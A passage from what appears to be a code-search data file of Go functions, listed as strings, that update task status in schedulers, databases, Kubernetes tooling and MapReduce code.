related *TaskStatus) error {\n\tvar err error\n\tif insert {\n\t\tif err = related.Insert(ctx, exec, boil.Infer()); err != nil {\n\t\t\treturn errors.Wrap(err, \"failed to insert into foreign table\")\n\t\t}\n\t}\n\n\tupdateQuery := fmt.Sprintf(\n\t\t\"UPDATE \\\"tasks\\\" SET %s WHERE %s\",\n\t\tstrmangle.SetParamNames(\"\\\"\", \"\\\"\", 1, []string{\"task_status_id\"}),\n\t\tstrmangle.WhereClause(\"\\\"\", \"\\\"\", 2, taskPrimaryKeyColumns),\n\t)\n\tvalues := []interface{}{related.ID, o.ID}\n\n\tif boil.IsDebug(ctx) {\n\t\twriter := boil.DebugWriterFrom(ctx)\n\t\tfmt.Fprintln(writer, updateQuery)\n\t\tfmt.Fprintln(writer, values)\n\t}\n\tif _, err = exec.ExecContext(ctx, updateQuery, values...); err != nil {\n\t\treturn errors.Wrap(err, \"failed to update local table\")\n\t}\n\n\to.TaskStatusID = related.ID\n\tif o.R == nil {\n\t\to.R = &taskR{\n\t\t\tTaskStatus: related,\n\t\t}\n\t} else {\n\t\to.R.TaskStatus = related\n\t}\n\n\tif related.R == nil {\n\t\trelated.R = &taskStatusR{\n\t\t\tTasks: TaskSlice{o},\n\t\t}\n\t} else {\n\t\trelated.R.Tasks = append(related.R.Tasks, o)\n\t}\n\n\treturn nil\n}", "func (w *WaitTask) StatusUpdate(taskContext *TaskContext, id object.ObjMetadata) {\n\tw.mu.Lock()\n\tdefer w.mu.Unlock()\n\n\tif klog.V(5).Enabled() {\n\t\tstatus := taskContext.ResourceCache().Get(id).Status\n\t\tklog.Infof(\"status update (object: %q, status: %q)\", id, status)\n\t}\n\n\tswitch {\n\tcase w.pending.Contains(id):\n\t\tswitch {\n\t\tcase w.changedUID(taskContext, id):\n\t\t\t// replaced\n\t\t\tw.handleChangedUID(taskContext, id)\n\t\t\tw.pending = w.pending.Remove(id)\n\t\tcase w.reconciledByID(taskContext, id):\n\t\t\t// reconciled - remove from pending & send event\n\t\t\terr := taskContext.InventoryManager().SetSuccessfulReconcile(id)\n\t\t\tif err != nil {\n\t\t\t\t// Object never applied or deleted!\n\t\t\t\tklog.Errorf(\"Failed to mark object as successful reconcile: %v\", err)\n\t\t\t}\n\t\t\tw.pending = w.pending.Remove(id)\n\t\t\tw.sendEvent(taskContext, id, event.ReconcileSuccessful)\n\t\tcase w.failedByID(taskContext, id):\n\t\t\t// failed - remove from pending & send event\n\t\t\terr := taskContext.InventoryManager().SetFailedReconcile(id)\n\t\t\tif err != nil {\n\t\t\t\t// Object never applied or deleted!\n\t\t\t\tklog.Errorf(\"Failed to mark object as failed reconcile: %v\", err)\n\t\t\t}\n\t\t\tw.pending = w.pending.Remove(id)\n\t\t\tw.failed = append(w.failed, id)\n\t\t\tw.sendEvent(taskContext, id, event.ReconcileFailed)\n\t\t\t// default - still pending\n\t\t}\n\tcase !w.Ids.Contains(id):\n\t\t// not in wait group - ignore\n\t\treturn\n\tcase w.skipped(taskContext, id):\n\t\t// skipped - ignore\n\t\treturn\n\tcase w.failed.Contains(id):\n\t\t// If a failed resource becomes current before other\n\t\t// resources have completed/timed out, we consider it\n\t\t// current.\n\t\tif w.reconciledByID(taskContext, id) {\n\t\t\t// reconciled - remove from pending & send event\n\t\t\terr := taskContext.InventoryManager().SetSuccessfulReconcile(id)\n\t\t\tif err != nil {\n\t\t\t\t// Object never applied or deleted!\n\t\t\t\tklog.Errorf(\"Failed to mark object as successful reconcile: %v\", err)\n\t\t\t}\n\t\t\tw.failed = w.failed.Remove(id)\n\t\t\tw.sendEvent(taskContext, id, event.ReconcileSuccessful)\n\t\t} else if !w.failedByID(taskContext, id) {\n\t\t\t// If a resource is no longer reported as Failed and is not Reconciled,\n\t\t\t// they should just go back to InProgress.\n\t\t\terr := taskContext.InventoryManager().SetPendingReconcile(id)\n\t\t\tif err != nil {\n\t\t\t\t// Object never applied or deleted!\n\t\t\t\tklog.Errorf(\"Failed to mark object as pending reconcile: %v\", err)\n\t\t\t}\n\t\t\tw.failed = w.failed.Remove(id)\n\t\t\tw.pending = append(w.pending, id)\n\t\t\tw.sendEvent(taskContext, id, event.ReconcilePending)\n\t\t}\n\t\t// else - still failed\n\tdefault:\n\t\t// reconciled - check if unreconciled\n\t\tif !w.reconciledByID(taskContext, id) {\n\t\t\t// unreconciled - add to pending & send event\n\t\t\terr := taskContext.InventoryManager().SetPendingReconcile(id)\n\t\t\tif err != nil {\n\t\t\t\t// Object never applied or deleted!\n\t\t\t\tklog.Errorf(\"Failed to mark object as pending reconcile: %v\", err)\n\t\t\t}\n\t\t\tw.pending = append(w.pending, id)\n\t\t\tw.sendEvent(taskContext, id, event.ReconcilePending)\n\t\t}\n\t\t// else - still reconciled\n\t}\n\n\tklog.V(3).Infof(\"wait task progress: %d/%d\", len(w.Ids)-len(w.pending), len(w.Ids))\n\n\t// If we no longer have any pending resources, the WaitTask\n\t// can be completed.\n\tif len(w.pending) == 0 {\n\t\t// all reconciled, so exit\n\t\tklog.V(3).Infof(\"all objects reconciled or skipped (name: %q)\", w.TaskName)\n\t\tw.cancelFunc()\n\t}\n}", "func (k *KubernetesScheduler) StatusUpdate(driver mesos.SchedulerDriver, taskStatus *mesos.TaskStatus) {\n\tlog.Infof(\"Received status update %v\\n\", taskStatus)\n\n\tk.Lock()\n\tdefer k.Unlock()\n\n\tswitch taskStatus.GetState() {\n\tcase mesos.TaskState_TASK_STAGING:\n\t\tk.handleTaskStaging(taskStatus)\n\tcase mesos.TaskState_TASK_STARTING:\n\t\tk.handleTaskStarting(taskStatus)\n\tcase mesos.TaskState_TASK_RUNNING:\n\t\tk.handleTaskRunning(taskStatus)\n\tcase mesos.TaskState_TASK_FINISHED:\n\t\tk.handleTaskFinished(taskStatus)\n\tcase mesos.TaskState_TASK_FAILED:\n\t\tk.handleTaskFailed(taskStatus)\n\tcase mesos.TaskState_TASK_KILLED:\n\t\tk.handleTaskKilled(taskStatus)\n\tcase mesos.TaskState_TASK_LOST:\n\t\tk.handleTaskLost(taskStatus)\n\t}\n}", "func (t *Task) ChangeStatus(s int) {\n\tt.Status = s\n}", "func UpdateTask(w http.ResponseWriter, r *http.Request, _ httprouter.Params) {\n\tfmt.Fprint(w, \"UpdateTask\\n\")\n}", "func taskComplete(task string) {\n\tlog.Println(task)\n\tid, _ := primitive.ObjectIDFromHex(task)\n\tfilter := bson.M{\"_id\": id}\n\tupdate := bson.M{\"$set\": bson.M{\"status\": true}}\n\tresult, err := collection.UpdateOne(context.Background(), filter, update)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tlog.Println(\"modified count: \", result.ModifiedCount)\n}", "func taskComplete(task string) {\n\tfmt.Println(task)\n\tid, _ := primitive.ObjectIDFromHex(task)\n\tfilter := bson.M{\"_id\": id}\n\tupdate := bson.M{\"$set\": bson.M{\"status\": true}}\n\tresult, err := collection.UpdateOne(context.Background(), filter, update)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(\"modified count: \", result.ModifiedCount)\n}", "func (e *Endpoints) SyncTaskStatus(interval time.Duration) {\n\tl := loop.New(loop.WithInterval(interval))\n\tl.Do(func() (bool, error) {\n\t\t// deal job resource\n\t\tjobs := e.dbclient.ListRunningJobs()\n\n\t\tfor _, job := range jobs {\n\t\t\t// 根据pipelineID获取task列表信息\n\t\t\tpipelineInfo, err := e.PipelineSvc.PipelineDetail(apis.WithInternalClientContext(context.Background(), discover.CMP()), &pipelinepb.PipelineDetailRequest{\n\t\t\t\tPipelineID: job.PipelineID,\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tlogrus.Errorf(\"failed to get pipeline info by pipelineID, pipelineID:%d, (%+v)\", job.PipelineID, err)\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tfor _, stage := range pipelineInfo.Data.PipelineStages {\n\t\t\t\tfor _, task := range stage.PipelineTasks {\n\t\t\t\t\tif task.ID == job.TaskID {\n\t\t\t\t\t\tif string(task.Status) != job.Status {\n\t\t\t\t\t\t\tjob.Status = string(task.Status)\n\n\t\t\t\t\t\t\t// 更新数据库状态\n\t\t\t\t\t\t\te.dbclient.UpdateJobStatus(&job)\n\t\t\t\t\t\t\tlogrus.Debugf(\"update job status, jobID:%d, status:%s\", job.ID, job.Status)\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t}\n\n\t\t// deal deployment resource\n\t\tdeployments := e.dbclient.ListRunningDeployments()\n\n\t\tfor _, deployment := range deployments {\n\t\t\t// 根据pipelineID获取task列表信息\n\t\t\tpipelineInfo, err := e.PipelineSvc.PipelineDetail(apis.WithInternalClientContext(context.Background(), discover.CMP()), &pipelinepb.PipelineDetailRequest{\n\t\t\t\tPipelineID: deployment.PipelineID,\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tlogrus.Errorf(\"failed to get pipeline info by pipelineID, pipelineID:%d, (%+v)\", deployment.PipelineID, err)\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tfor _, stage := range pipelineInfo.Data.PipelineStages {\n\t\t\t\tfor _, task := range stage.PipelineTasks {\n\t\t\t\t\tif task.ID == deployment.TaskID {\n\t\t\t\t\t\tif string(task.Status) != deployment.Status {\n\t\t\t\t\t\t\tdeployment.Status = string(task.Status)\n\n\t\t\t\t\t\t\t// 更新数据库状态\n\t\t\t\t\t\t\te.dbclient.UpdateDeploymentStatus(&deployment)\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t}\n\n\t\treturn false, nil\n\t})\n}", "func taskComplete(task string){\n\tfmt.Println(task)\n\tid, _ := primitive.ObjectIDFromHex(task)\n\tfilter := bson.M{\"_id\": id}\n\tupdate := bson.M{\"$set\": bson.M{\"status\": true}}\n\t_, err := collection.UpdateOne(context.Background(), filter, update)\n\tif err != nil {\n\t\tlog.Fatal(\"Error update task\", err)\n\t}\n\n\tfmt.Println(\"Task defined complete: \", id)\n}", "func UpdateTaskResult(tid int64, output string, exit_code int,\n\tgen_file_name bool) string {\n\tnew_status := Succeeded\n\tif exit_code != 0 {\n\t\tnew_status = Failed\n\t}\n\n\tvar file_name, dummy string\n\n\tif gen_file_name {\n\t\tfile_name = nonExistingRandString(Token_length,\n\t\t\t\"SELECT 42 FROM tasks WHERE patch = $1 || '.patch'\") + \".patch\"\n\t}\n\n\tdb.QueryRow(\"UPDATE tasks SET status=$1, end_time=now(), output=$2, \"+\n\t\t\"exit_status=$3, patch=$4 WHERE id=$5\", new_status, output, exit_code,\n\t\tfile_name, tid).Scan(&dummy)\n\n\treturn file_name\n}", "func updateTaskState(task *api.Task) api.TaskStatus {\n\t//The task is the minimum status of all its essential containers unless the\n\t//status is terminal in which case it's that status\n\tlog.Debug(\"Updating task\", \"task\", task)\n\n\t// minContainerStatus is the minimum status of all essential containers\n\tminContainerStatus := api.ContainerDead + 1\n\t// minContainerStatus is the minimum status of all containers to be used in\n\t// the edge case of no essential containers\n\tabsoluteMinContainerStatus := minContainerStatus\n\tfor _, cont := range task.Containers {\n\t\tlog.Debug(\"On container\", \"cont\", cont)\n\t\tif cont.KnownStatus < absoluteMinContainerStatus {\n\t\t\tabsoluteMinContainerStatus = cont.KnownStatus\n\t\t}\n\t\tif !cont.Essential {\n\t\t\tcontinue\n\t\t}\n\n\t\t// Terminal states\n\t\tif cont.KnownStatus == api.ContainerStopped {\n\t\t\tif task.KnownStatus < api.TaskStopped {\n\t\t\t\ttask.KnownStatus = api.TaskStopped\n\t\t\t\treturn task.KnownStatus\n\t\t\t}\n\t\t} else if cont.KnownStatus == api.ContainerDead {\n\t\t\tif task.KnownStatus < api.TaskDead {\n\t\t\t\ttask.KnownStatus = api.TaskDead\n\t\t\t\treturn task.KnownStatus\n\t\t\t}\n\t\t}\n\t\t// Non-terminal\n\t\tif cont.KnownStatus < minContainerStatus {\n\t\t\tminContainerStatus = cont.KnownStatus\n\t\t}\n\t}\n\n\tif minContainerStatus == api.ContainerDead+1 {\n\t\tlog.Warn(\"Task with no essential containers; all properly formed tasks should have at least one essential container\", \"task\", task)\n\n\t\t// If there's no essential containers, let's just assume the container\n\t\t// with the earliest status is essential and proceed.\n\t\tminContainerStatus = absoluteMinContainerStatus\n\t}\n\n\tlog.Info(\"MinContainerStatus is \" + minContainerStatus.String())\n\n\tif minContainerStatus == api.ContainerCreated {\n\t\tif task.KnownStatus < api.TaskCreated {\n\t\t\ttask.KnownStatus = api.TaskCreated\n\t\t\treturn task.KnownStatus\n\t\t}\n\t} else if minContainerStatus == api.ContainerRunning {\n\t\tif task.KnownStatus < api.TaskRunning {\n\t\t\ttask.KnownStatus = api.TaskRunning\n\t\t\treturn task.KnownStatus\n\t\t}\n\t} else if minContainerStatus == api.ContainerStopped {\n\t\tif task.KnownStatus < api.TaskStopped {\n\t\t\ttask.KnownStatus = api.TaskStopped\n\t\t\treturn task.KnownStatus\n\t\t}\n\t} else if minContainerStatus == api.ContainerDead {\n\t\tif task.KnownStatus < api.TaskDead {\n\t\t\ttask.KnownStatus = api.TaskDead\n\t\t\treturn task.KnownStatus\n\t\t}\n\t}\n\treturn api.TaskStatusNone\n}", "func (p *statusUpdate) ProcessStatusUpdate(\n\tctx context.Context,\n\tupdateEvent *statusupdate.Event,\n) error {\n\tvar currTaskResourceUsage map[string]float64\n\tp.logTaskMetrics(updateEvent)\n\n\tisOrphanTask, taskInfo, err := p.isOrphanTaskEvent(ctx, updateEvent)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif isOrphanTask {\n\t\tp.metrics.SkipOrphanTasksTotal.Inc(1)\n\t\ttaskInfo := &pb_task.TaskInfo{\n\t\t\tRuntime: &pb_task.RuntimeInfo{\n\t\t\t\tState: updateEvent.State(),\n\t\t\t\tMesosTaskId: updateEvent.MesosTaskID(),\n\t\t\t\tAgentID: updateEvent.AgentID(),\n\t\t\t},\n\t\t}\n\n\t\t// Kill the orphan task\n\t\tfor i := 0; i < _numOrphanTaskKillAttempts; i++ {\n\t\t\terr = jobmgr_task.KillOrphanTask(ctx, p.lm, taskInfo)\n\t\t\tif err == nil {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\ttime.Sleep(_waitForRetryOnErrorOrphanTaskKill)\n\t\t}\n\t\treturn nil\n\t}\n\n\t// whether to skip or not if instance state is similar before and after\n\tif isDuplicateStateUpdate(taskInfo, updateEvent) {\n\t\treturn nil\n\t}\n\n\tif updateEvent.State() == pb_task.TaskState_RUNNING &&\n\t\ttaskInfo.GetConfig().GetVolume() != nil &&\n\t\tlen(taskInfo.GetRuntime().GetVolumeID().GetValue()) != 0 {\n\t\t// Update volume state to be CREATED upon task RUNNING.\n\t\tif err := p.updatePersistentVolumeState(ctx, taskInfo); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tnewRuntime := proto.Clone(taskInfo.GetRuntime()).(*pb_task.RuntimeInfo)\n\n\t// Persist the reason and message for mesos updates\n\tnewRuntime.Message = updateEvent.StatusMsg()\n\tnewRuntime.Reason = \"\"\n\n\t// Persist healthy field if health check is enabled\n\tif taskInfo.GetConfig().GetHealthCheck() != nil {\n\t\treason := updateEvent.Reason()\n\t\thealthy := updateEvent.Healthy()\n\t\tp.persistHealthyField(updateEvent.State(), reason, healthy, newRuntime)\n\t}\n\n\t// Update FailureCount\n\tupdateFailureCount(updateEvent.State(), taskInfo.GetRuntime(), newRuntime)\n\n\tswitch updateEvent.State() {\n\tcase pb_task.TaskState_FAILED:\n\t\treason := updateEvent.Reason()\n\t\tmsg := updateEvent.Message()\n\t\tif reason == mesos.TaskStatus_REASON_TASK_INVALID.String() &&\n\t\t\tstrings.Contains(msg, _msgMesosDuplicateID) {\n\t\t\tlog.WithField(\"task_id\", updateEvent.TaskID()).\n\t\t\t\tInfo(\"ignoring duplicate task id failure\")\n\t\t\treturn nil\n\t\t}\n\t\tnewRuntime.Reason = reason\n\t\tnewRuntime.State = updateEvent.State()\n\t\tnewRuntime.Message = msg\n\t\t// TODO p2k: can we build TerminationStatus from PodEvent?\n\t\ttermStatus := &pb_task.TerminationStatus{\n\t\t\tReason: pb_task.TerminationStatus_TERMINATION_STATUS_REASON_FAILED,\n\t\t}\n\t\tif code, err := taskutil.GetExitStatusFromMessage(msg); err == nil {\n\t\t\ttermStatus.ExitCode = code\n\t\t} else if yarpcerrors.IsNotFound(err) == false {\n\t\t\tlog.WithField(\"task_id\", updateEvent.TaskID()).\n\t\t\t\tWithField(\"error\", err).\n\t\t\t\tDebug(\"Failed to extract exit status from message\")\n\t\t}\n\t\tif sig, err := taskutil.GetSignalFromMessage(msg); err == nil {\n\t\t\ttermStatus.Signal = sig\n\t\t} else if yarpcerrors.IsNotFound(err) == false {\n\t\t\tlog.WithField(\"task_id\", updateEvent.TaskID()).\n\t\t\t\tWithField(\"error\", err).\n\t\t\t\tDebug(\"Failed to extract termination signal from message\")\n\t\t}\n\t\tnewRuntime.TerminationStatus = termStatus\n\n\tcase pb_task.TaskState_LOST:\n\t\tnewRuntime.Reason = updateEvent.Reason()\n\t\tif util.IsPelotonStateTerminal(taskInfo.GetRuntime().GetState()) {\n\t\t\t// Skip LOST status update if current state is terminal state.\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"task_id\": updateEvent.TaskID(),\n\t\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\t\"task_status_event\": updateEvent.MesosTaskStatus(),\n\t\t\t}).Debug(\"skip reschedule lost task as it is already in terminal state\")\n\t\t\treturn nil\n\t\t}\n\t\tif taskInfo.GetRuntime().GetGoalState() == pb_task.TaskState_KILLED {\n\t\t\t// Do not take any action for killed tasks, just mark it killed.\n\t\t\t// Same message will go to resource manager which will release the placement.\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"task_id\": updateEvent.TaskID(),\n\t\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\t\"task_status_event\": updateEvent.MesosTaskStatus(),\n\t\t\t}).Debug(\"mark stopped task as killed due to LOST\")\n\t\t\tnewRuntime.State = pb_task.TaskState_KILLED\n\t\t\tnewRuntime.Message = \"Stopped task LOST event: \" + updateEvent.StatusMsg()\n\t\t\tbreak\n\t\t}\n\n\t\tif taskInfo.GetConfig().GetVolume() != nil &&\n\t\t\tlen(taskInfo.GetRuntime().GetVolumeID().GetValue()) != 0 {\n\t\t\t// Do not reschedule stateful task. Storage layer will decide\n\t\t\t// whether to start or replace this task.\n\t\t\tnewRuntime.State = pb_task.TaskState_LOST\n\t\t\tbreak\n\t\t}\n\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"task_id\": updateEvent.TaskID(),\n\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\"task_status_event\": updateEvent.MesosTaskStatus(),\n\t\t}).Info(\"reschedule lost task if needed\")\n\n\t\tnewRuntime.State = pb_task.TaskState_LOST\n\t\tnewRuntime.Message = \"Task LOST: \" + updateEvent.StatusMsg()\n\t\tnewRuntime.Reason = updateEvent.Reason()\n\n\t\t// Calculate resource usage for TaskState_LOST using time.Now() as\n\t\t// completion time\n\t\tcurrTaskResourceUsage = getCurrTaskResourceUsage(\n\t\t\tupdateEvent.TaskID(), updateEvent.State(), taskInfo.GetConfig().GetResource(),\n\t\t\ttaskInfo.GetRuntime().GetStartTime(),\n\t\t\tnow().UTC().Format(time.RFC3339Nano))\n\n\tdefault:\n\t\tnewRuntime.State = updateEvent.State()\n\t}\n\n\tcachedJob := p.jobFactory.AddJob(taskInfo.GetJobId())\n\t// Update task start and completion timestamps\n\tif newRuntime.GetState() == pb_task.TaskState_RUNNING {\n\t\tif updateEvent.State() != taskInfo.GetRuntime().GetState() {\n\t\t\t// StartTime is set at the time of first RUNNING event\n\t\t\t// CompletionTime may have been set (e.g. task has been set),\n\t\t\t// which could make StartTime larger than CompletionTime.\n\t\t\t// Reset CompletionTime every time a task transits to RUNNING state.\n\t\t\tnewRuntime.StartTime = now().UTC().Format(time.RFC3339Nano)\n\t\t\tnewRuntime.CompletionTime = \"\"\n\t\t\t// when task is RUNNING, reset the desired host field. Therefore,\n\t\t\t// the task would be scheduled onto a different host when the task\n\t\t\t// restarts (e.g due to health check or fail retry)\n\t\t\tnewRuntime.DesiredHost = \"\"\n\n\t\t\tif len(taskInfo.GetRuntime().GetDesiredHost()) != 0 {\n\t\t\t\tp.metrics.TasksInPlacePlacementTotal.Inc(1)\n\t\t\t\tif taskInfo.GetRuntime().GetDesiredHost() == taskInfo.GetRuntime().GetHost() {\n\t\t\t\t\tp.metrics.TasksInPlacePlacementSuccess.Inc(1)\n\t\t\t\t} else {\n\t\t\t\t\tlog.WithField(\"job_id\", taskInfo.GetJobId().GetValue()).\n\t\t\t\t\t\tWithField(\"instance_id\", taskInfo.GetInstanceId()).\n\t\t\t\t\t\tInfo(\"task fail to place on desired host\")\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t} else if util.IsPelotonStateTerminal(newRuntime.GetState()) &&\n\t\tcachedJob.GetJobType() == pbjob.JobType_BATCH {\n\t\t// only update resource count when a batch job is in terminal state\n\t\tcompletionTime := now().UTC().Format(time.RFC3339Nano)\n\t\tnewRuntime.CompletionTime = completionTime\n\n\t\tcurrTaskResourceUsage = getCurrTaskResourceUsage(\n\t\t\tupdateEvent.TaskID(), updateEvent.State(), taskInfo.GetConfig().GetResource(),\n\t\t\ttaskInfo.GetRuntime().GetStartTime(), completionTime)\n\n\t\tif len(currTaskResourceUsage) > 0 {\n\t\t\t// current task resource usage was updated by this event, so we should\n\t\t\t// add it to aggregated resource usage for the task and update runtime\n\t\t\taggregateTaskResourceUsage := taskInfo.GetRuntime().GetResourceUsage()\n\t\t\tif len(aggregateTaskResourceUsage) > 0 {\n\t\t\t\tfor k, v := range currTaskResourceUsage {\n\t\t\t\t\taggregateTaskResourceUsage[k] += v\n\t\t\t\t}\n\t\t\t\tnewRuntime.ResourceUsage = aggregateTaskResourceUsage\n\t\t\t}\n\t\t}\n\t} else if cachedJob.GetJobType() == pbjob.JobType_SERVICE {\n\t\t// for service job, reset resource usage\n\t\tcurrTaskResourceUsage = nil\n\t\tnewRuntime.ResourceUsage = nil\n\t}\n\n\t// Update the task update times in job cache and then update the task runtime in cache and DB\n\tcachedJob.SetTaskUpdateTime(updateEvent.Timestamp())\n\tif _, err = cachedJob.CompareAndSetTask(\n\t\tctx,\n\t\ttaskInfo.GetInstanceId(),\n\t\tnewRuntime,\n\t\tfalse,\n\t); err != nil {\n\t\tlog.WithError(err).\n\t\t\tWithFields(log.Fields{\n\t\t\t\t\"task_id\": updateEvent.TaskID(),\n\t\t\t\t\"state\": updateEvent.State().String()}).\n\t\t\tError(\"Fail to update runtime for taskID\")\n\t\treturn err\n\t}\n\n\t// Enqueue task to goal state\n\tp.goalStateDriver.EnqueueTask(\n\t\ttaskInfo.GetJobId(),\n\t\ttaskInfo.GetInstanceId(),\n\t\ttime.Now())\n\t// Enqueue job to goal state as well\n\tgoalstate.EnqueueJobWithDefaultDelay(\n\t\ttaskInfo.GetJobId(), p.goalStateDriver, cachedJob)\n\n\t// Update job's resource usage with the current task resource usage.\n\t// This is a noop in case currTaskResourceUsage is nil\n\t// This operation is not idempotent. So we will update job resource usage\n\t// in cache only after successfully updating task resource usage in DB\n\t// In case of errors in PatchTasks(), ProcessStatusUpdate will be retried\n\t// indefinitely until errors are resolved.\n\tcachedJob.UpdateResourceUsage(currTaskResourceUsage)\n\treturn nil\n}", "func (r *TaskRepository) UpdateTask(db db.DB, task *entities.Task) error {\n\t_, err := db.NamedExec(`UPDATE tasks SET title=:title, status=:status WHERE id=:id`, task)\n\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error updating task status: %w\", err)\n\t}\n\n\treturn nil\n}", "func UpdateStatus(taskID, status int, db *sql.DB) bool {\n\n\tvar parentID int\n\tsqlStatement2 := `SELECT project, status FROM tasks WHERE id = $1;`\n\n\tvar oldStatus int\n\terr = db.QueryRow(sqlStatement2, taskID).Scan(&parentID, &oldStatus)\n\tif err == sql.ErrNoRows {\n\t\tfmt.Println(\"First1\")\n\t\treturn false\n\t} else if err != nil {\n\t\tfmt.Println(\"First2\")\n\t\treturn false\n\t}\n\tvar oldColumn string\n\tif oldStatus == 0 {\n\t\toldColumn = \"inprogress_tasks\"\n\t} else if oldStatus == 1 {\n\t\toldColumn = \"todo_tasks\"\n\t} else {\n\t\toldColumn = \"completed_tasks\"\n\t}\n\n\tvar newColumn string\n\tif status == 0 {\n\t\tnewColumn = \"inprogress_tasks\"\n\t} else if status == 1 {\n\t\tnewColumn = \"todo_tasks\"\n\t} else {\n\t\tnewColumn = \"completed_tasks\"\n\t}\n\n\tsqlStatement3 := `UPDATE tasks SET status = $1 WHERE id = $2;`\n\t_, err = db.Exec(sqlStatement3, status, taskID)\n\tif err != nil {\n\t\tfmt.Println(\"Second\")\n\t\treturn false\n\t}\n\n\tsqlStatement4 := `UPDATE projects SET $1 = array_remove($1, $2) WHERE id = $3;`\n\t_, err = db.Exec(sqlStatement4, oldColumn, taskID, parentID)\n\tif err != nil {\n\t\tfmt.Println(\"Third\")\n\t\treturn false\n\t}\n\n\tsqlStatement5 := `UPDATE projects SET $1 = array_cat($1, $2) WHERE id = $3;`\n\t_, err = db.Exec(sqlStatement5, newColumn, taskID, parentID)\n\tif err != nil {\n\t\tfmt.Println(\"Fourth\")\n\t\treturn false\n\t}\n\n\treturn true\n}", "func (s *Storage) UpdateTask(task *todopb.TaskUpdateRequest) (*todopb.TaskResponse, error) {\n\tvar lastUpdateID uint\n\n\terr := s.db.QueryRow(\"UPDATE tasks SET title=$1, completed=$2 WHERE id=$3 RETURNING id\", task.Title, task.Completed, uint(task.Id)).Scan(&lastUpdateID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn s.GetTask(lastUpdateID)\n}", "func (w *worker) updateTask(bq *InMemoryBuildQueue, scq *sizeClassQueue, workerID map[string]string, actionDigest *remoteexecution.Digest, preferBeingIdle bool) (*remoteworker.SynchronizeResponse, error) {\n\tif !w.isRunningCorrectTask(actionDigest) {\n\t\treturn w.getCurrentOrNextTask(nil, bq, scq, workerID, preferBeingIdle)\n\t}\n\t// The worker is doing fine. Allow it to continue with what it's\n\t// doing right now.\n\treturn &remoteworker.SynchronizeResponse{\n\t\tNextSynchronizationAt: bq.getNextSynchronizationAtDelay(),\n\t}, nil\n}", "func (t TaskRepoCassandra) UpdateTask(ctx context.Context, inputStruct interface{}, partnerID string, taskID gocql.UUID) (err error) {\n\tvar tasks []Task\n\t// update the task\n\tswitch v := inputStruct.(type) {\n\tcase *SelectedManagedEndpointEnable:\n\t\tif tasks, err = t.getTasksBySelectedEndpoints(v, ctx, partnerID, taskID); err != nil {\n\t\t\treturn err\n\t\t}\n\tcase *AllTargetsEnable:\n\t\ttasks, err = TaskPersistenceInstance.GetByIDs(ctx, nil, partnerID, false, taskID)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tif tasks, err = updateAllTaskTargets(ctx, tasks, v); err != nil {\n\t\t\treturn\n\t\t}\n\tdefault:\n\t\treturn errors.New(\"wrong input type for update\")\n\t}\n\n\tif len(tasks) == 0 {\n\t\treturn CantUpdateTaskError{taskID, inputStruct}\n\t}\n\n\t// Update only scheduled instance\n\tcurrentTaskInstances, err := TaskInstancePersistenceInstance.GetByIDs(ctx, tasks[0].LastTaskInstanceID)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif len(currentTaskInstances) == 0 {\n\t\treturn CantUpdateTaskError{taskID, inputStruct}\n\t}\n\n\ttask := tasks[0]\n\tinst, err := t.getInstanceToDisable(task, currentTaskInstances[0])\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tinst.Statuses = t.setInstanceStatuses(tasks, inst)\n\n\tif err = TaskInstancePersistenceInstance.Insert(ctx, inst); err != nil {\n\t\treturn err\n\t}\n\n\treturn TaskPersistenceInstance.InsertOrUpdate(ctx, tasks...)\n}", "func (m *MockICompilationTask) UpdateTaskStatus(taskID uint, status string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"UpdateTaskStatus\", taskID, status)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (s *stat) DoneTask(t task.Task) {\n\ts.mu.Lock()\n\tdefer s.mu.Unlock()\n\tif _, found := s.inProgress[key(t)]; !found {\n\t\treturn\n\t}\n\tdelete(s.inProgress, key(t))\n\n\tjobid := getJobID(&t)\n\n\tstart, _ := time.Parse(time.RFC3339, t.Started)\n\tend, _ := time.Parse(time.RFC3339, t.Ended)\n\td := end.Sub(start)\n\tjobRuntimeMetric.WithLabelValues(t.Type, jobid).Observe(d.Seconds())\n\n\tif t.Result == task.ErrResult {\n\t\ts.error.Add(d)\n\t\tjobFailureMetric.WithLabelValues(t.Type, jobid).Inc()\n\t} else if t.Result == task.CompleteResult {\n\t\ts.success.Add(d)\n\t\tjobSuccessMetric.WithLabelValues(t.Type, jobid).Inc()\n\t}\n}", "func (m *Master) SignalTaskStatus(args *model.TaskStatus, reply *bool) error {\n\tif !args.Success {\n\t\treturn nil\n\t}\n\n\tif m.phase == model.Map {\n\t\tlog.Infof(\"map phase for %s completed\", args.File)\n\t\tm.mutex.Lock()\n\t\tdefer m.mutex.Unlock()\n\t\tf := path.Base(args.File)\n\t\tif t, ok := m.mapTasks[f]; ok {\n\t\t\tif t.Status == inprogress {\n\t\t\t\tt.Status = completed\n\t\t\t\tt.Files = append(t.Files, args.OutFiles...)\n\t\t\t\tm.mapTasks[f] = t\n\t\t\t}\n\n\t\t\t// Build up reduce tasks.\n\t\t\tfor i, v := range args.OutFiles 